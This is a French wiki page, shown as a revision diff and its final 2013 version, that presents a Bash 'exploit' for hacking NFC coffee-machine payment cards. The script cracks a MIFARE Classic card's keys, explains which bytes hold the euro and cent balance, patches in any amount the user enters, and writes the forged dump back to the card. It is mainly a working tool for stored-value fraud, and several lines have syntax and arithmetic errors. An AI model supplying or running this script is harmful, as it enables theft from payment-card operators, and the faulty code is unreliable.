« NFC Coffee POC » : différence entre les versions
Aller à la navigation
Aller à la recherche
Page créée avec « == Hack NFC Coffeemaker for fun and profit == === Processus === * On dump une carte existante * On repère les informations qui nous intéressent * On altère le dump * O... » |
|||
| (17 versions intermédiaires par le même utilisateur non affichées) | |||
| Ligne 2 : | Ligne 2 : | ||
=== Processus === | === Processus === | ||
# On dump une carte existante | |||
# On repère les informations qui nous intéressent | |||
# On altère le dump | |||
# On charge le dump altéré sur la carte | |||
==== Exploit Bash ==== | |||
Se référer aux [[Opérations de base sur le NFC]] pour plus de précisions. | |||
#!/bin/bash | |||
#Script by Korigan for http://hackbbs.org | |||
#Contact: irc.hackbbs.org,6697,#HackBBS | |||
echo "Dump de la carte..." | |||
mfoc -P 500 -O dumpNFC.dmp | |||
echo "Voici ce que nous recherchons:" | |||
echo "AAAAAAA 00DD EEFF 0000 0000 0000 0000 0000 00CC | |||
echo "00000A0 BBCC 0000 0000 0000 0000 0000 0000 0000" | |||
echo "Si BB==0x55 alors AAAAAAA==0000090 sinon AAAAAAA==0000080" | |||
echo "CC est un compteur du nombre de transactions réalisées" | |||
echo "DD représente les centimes en hexa" | |||
echo "EE représente les euro en hexa" | |||
echo "FF est la somme en hexa de DD+EE" | |||
BBCC=xxd -s +160 dumpNFC.dmp | head -n 1 | cut -d' ' -f2 | |||
BB=${BBCC:0:2} | |||
CC=${BBCC:2:2} | |||
if [ [ $BB -eq "55" ] ] then | |||
AAAAAAA="0000090" | |||
else | |||
AAAAAAA="0000080" | |||
fi | |||
read -p "Quel montant(en centimes) doit-on pousser sur la carte?" amount | |||
EEDD=`printf '%x' $amount` | |||
DD=${EEDD:${#EEDD}-2} #On calcul la valeur hexadécimal des centimes | |||
EE=$((EEDD-DD)) #Calcul hexadécimal des unités | |||
FF=`printf "%X" $((0x$DD+0x$EE))` #On additionne les deux valeurs | |||
echo "Patch du dump..." | |||
echo "$AAAAAAA: 00$DD $EE$FF" | xxd -r - dumpNFC.dmp | |||
echo "On charge le nouveau dump sur la carte..." | |||
nfc-mfclassic w X dumpNFC.dmp dumpNFC.dmp | |||
echo "Done :)" | |||
Dernière version du 10 septembre 2013 à 18:12
Hack NFC Coffeemaker for fun and profit
Processus
- On dump une carte existante
- On repère les informations qui nous intéressent
- On altère le dump
- On charge le dump altéré sur la carte
Exploit Bash
Se référer aux Opérations de base sur le NFC pour plus de précisions.
#!/bin/bash #Script by Korigan for http://hackbbs.org #Contact: irc.hackbbs.org,6697,#HackBBS echo "Dump de la carte..." mfoc -P 500 -O dumpNFC.dmp echo "Voici ce que nous recherchons:" echo "AAAAAAA 00DD EEFF 0000 0000 0000 0000 0000 00CC echo "00000A0 BBCC 0000 0000 0000 0000 0000 0000 0000" echo "Si BB==0x55 alors AAAAAAA==0000090 sinon AAAAAAA==0000080" echo "CC est un compteur du nombre de transactions réalisées" echo "DD représente les centimes en hexa" echo "EE représente les euro en hexa" echo "FF est la somme en hexa de DD+EE" BBCC=xxd -s +160 dumpNFC.dmp | head -n 1 | cut -d' ' -f2 BB=${BBCC:0:2} CC=${BBCC:2:2} if [ [ $BB -eq "55" ] ] then AAAAAAA="0000090" else AAAAAAA="0000080" fi read -p "Quel montant(en centimes) doit-on pousser sur la carte?" amount EEDD=`printf '%x' $amount` DD=${EEDD:${#EEDD}-2} #On calcul la valeur hexadécimal des centimes EE=$((EEDD-DD)) #Calcul hexadécimal des unités FF=`printf "%X" $((0x$DD+0x$EE))` #On additionne les deux valeurs echo "Patch du dump..." echo "$AAAAAAA: 00$DD $EE$FF" | xxd -r - dumpNFC.dmp echo "On charge le nouveau dump sur la carte..." nfc-mfclassic w X dumpNFC.dmp dumpNFC.dmp echo "Done :)"